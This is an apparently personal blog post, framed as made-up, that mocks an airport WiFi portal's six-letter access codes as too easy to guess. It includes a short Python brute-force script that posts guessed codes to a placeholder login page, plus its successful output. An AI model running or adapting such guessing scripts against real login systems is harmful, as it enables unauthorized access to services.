Title: Mind your keyspace, $airport
Date: 2018-05-09 18:30

(This is of course a completely made up story that I entirely invented because
I was bored.)

Today, I was waiting for my flight in an international airport,
so I though about giving a try to the WiFi.
Unsurprisingly, I was asked an email address, a full name,
and a working phone number, to send me a 6-letters code.

I mumbled something about the [GDPR](https://en.wikipedia.org/wiki/GDPR)
while reading the captive portal's webpage,
and stumbled upon those two sentences:

> After you register, your code will be stored for 12 months.
> During this period you can reconnect without having to register again.

For extra kindness, the page provides a nice example of
what a code might look like: 6 capital letters.

So, an airport handling a bit less than 30 million passengers per year is using
secret codes with a limit of 26⁶ (308.915.776) different possibilities…
Since the WiFi is *free* (you're paying with your personal data and by
receiving spam), odds are that a significant percentage of the people
are using it. With a conversion rate of ⅛, a blind guess would have a
~1% chance of being correct. Codes are giving 2h of internet access, and are
automatically reseted every 5 hours.

```python
import requests
import string
import itertools

ks = itertools.combinations_with_replacement(string.ascii_uppercase, 6)
for c in ks:
    r = requests.post('https://super-airport.plane/login.php', data={'secret_code': ''.join(c), 'submit': 'Login'})
    if not 'This code is invalid.' in r.text:
        print(c)
        break
```

Resulting in:

```bash
jvoisin@grimhilde 16:03 ~ python test.py
AAAAAL
```

Yay, free WiFi.